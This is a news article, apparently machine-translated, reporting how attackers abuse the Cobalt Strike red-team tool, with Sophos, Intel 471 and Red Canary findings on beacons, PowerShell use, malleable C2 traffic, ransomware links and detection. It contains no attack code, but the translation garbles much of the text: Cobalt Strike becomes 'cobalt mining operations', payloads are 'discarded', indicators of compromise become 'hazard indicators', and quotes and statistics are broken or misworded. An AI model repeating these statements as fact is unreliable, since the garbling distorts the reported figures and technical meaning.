Incident response cases and studies have shown that red team tools have become the first choice of attackers.
RSA Conference 2021-In the past two decades, the open source Metasploit hacking platform has aroused enthusiasm and frustration among security teams. They both need tools to test their networks and worry that cybercriminals or other bad actors will attack them. attack.
Today, Metasploit is still popular among good and bad hackers, but another red team tool, Cobalt Strike, is increasingly playing a major role in attacks. Attackers are using customized, cloned or even purchased Cobalt Strike versions to penetrate the victim’s network and weaponize the tools used in the second-stage attack to carry payloads (including Metasploit attacks).
The threat simulation software suite used for penetration testing was created by researcher Raphael Mudge in 2012 and was acquired by HelpSystems last year. The most popular component of malicious hackers is the beacon, which works like an attacker, running PowerShell scripts, recording keystrokes, capturing screenshots, stealing files, and discarding other payloads or malware.
HelpSystems declined to comment for this article.
Sophos’ new data categorizes the behavior, tools, techniques, and procedures (TTP) of attackers. These data indicate that Cobalt Strike is an attacker in the cases witnessed by threat hunters and incident responders last year and the first half of 2021. One of the top five tools used. It is also a key factor when attackers use PowerShell commands to disguise activity on the victim’s network. Nearly 60% of PowerShell vulnerabilities exploited Cobalt Strike, and about 12% of attacks used a combination of Cobalt Strike and Microsoft Windows tools PowerShell and PsExec. According to Sophos’ latest “Active Adversary Playbook 2021” report, it was also paired with PsExec in nearly a third of attacks.
John Shier, a senior security consultant at Sophos, said: “Cobalt Strike facilitates deployment by PowerShell.” “coding [Cobalt Strike] Was leaked on the Internet a long time ago, [attackers] Knowing how to use it, this is an evasion technique” that can stay under the radar as the attack escalates and spreads.
The Russian GRU hacker group behind the SolarWinds supply chain attack is one of the attackers’ most notable uses. They built custom shellcode loaders that dropped the Cobalt Strike payload: the Teardrop and Raindrop malware components of the attack.
Intel 471 researchers and incident responders said that the malicious use of Cobalt Strike is related to the rise of ransomware in recent years, but it is also used to discard other types of malware and steal data. The malware groups that use Cobalt Strike include: Trickbot, Hancitor, Qbot, SystemBC, Smokeloader and Bazar. Researchers today released a hazard indicator, indicating that Cobalt Strike is related to these malware families.
Intel 471 CISO Brandon Hoffman (Brandon Hoffman) said that attackers seem to like the features of Cobalt Strike, especially the beacon component. “From the perspective of the exploited tool, it has many built-in functions; it is very suitable for the second stage of the attack, you don’t need to choose various malware, you only need to convert it and all its functions,” he said.
The tool also contains a “malicious attacker” command and control (C2) function, which allows an attacker to model his C2 network into different groups of threat actors. He said: “Malicious C2 can allow you to imitate behavior or make C2 traffic look almost like any legitimate service.” So, for example, if an organization allows users to stream Pandora, the forgeable C2 may be disguised as a victim. Pandora traffic in the network.
Hoffman said: “This makes it extremely difficult to detect attacks.” “Beacons are so customizable.”
Experts say that even so, there are still ways to detect malicious abuse of cobalt attacks.In addition to bad guys who make mistakes and leave clues or breadcrumbs, if you are monitoring the activity, you can find that the attack spread by the “cobalt strike” is in progress: Reply [case] Hoffman explained: “If you find that some content in a command and control server may be a beacon, it’s okay. If you create a Yara rule for some malicious script, you can also detect it.”
Hoffman said: “Where you saw a cobalt strike in the wild, some people reused it for the same malware family,” Hoffman said. His team today released the findings (including indicators of harm) about the cybercriminal organization that deployed the “Cobalt Strike”.
“We have seen a correlation between the rise in the use of cobalt strikes [by adversaries] The rise of ransomware. Hoffman said: “We are not saying that Cobalt Strike contributed to ransomware. Rather, ransomware was discarded in the later stages of the attack chain. “Before entering ransomware, attackers must first deploy something similar. . [Cobalt Strike]. “Therefore, discovering this activity before installing the ransomware can save a lot of trouble.
Speaking of ransomware, Sophos’ IR and threat hunting data found ransomware in more than 80% of the incidents they investigated. Sophos’ Shier said: “The ransomware is noisy and needs attention,” which is why these cases are flagged for investigation. “[In] He said: “We have stopped many attacks, and we have also discovered “cobalt strike” activities.
Red Canary researchers also found that attackers used Cobalt Strike to conduct targeted attacks, including payment card theft and ransomware activities. They described incidents in which an attacker using the Bazar malware used the Cobalt Strike payload before throwing the Ryuk ransomware at the victim, and these incidents were completed within two hours.
“Cobalt Strike is so common and reliable that adversaries can successfully create their own custom tools to simply deploy payloads knowing that they can obtain payloads through security controls. This feature demonstrates how Cobalt Strike can adapt to threat models for almost all organizations It’s all the same.” According to Red Canary’s report, it includes detailed information on the methods used to detect malicious cobalt mining operations.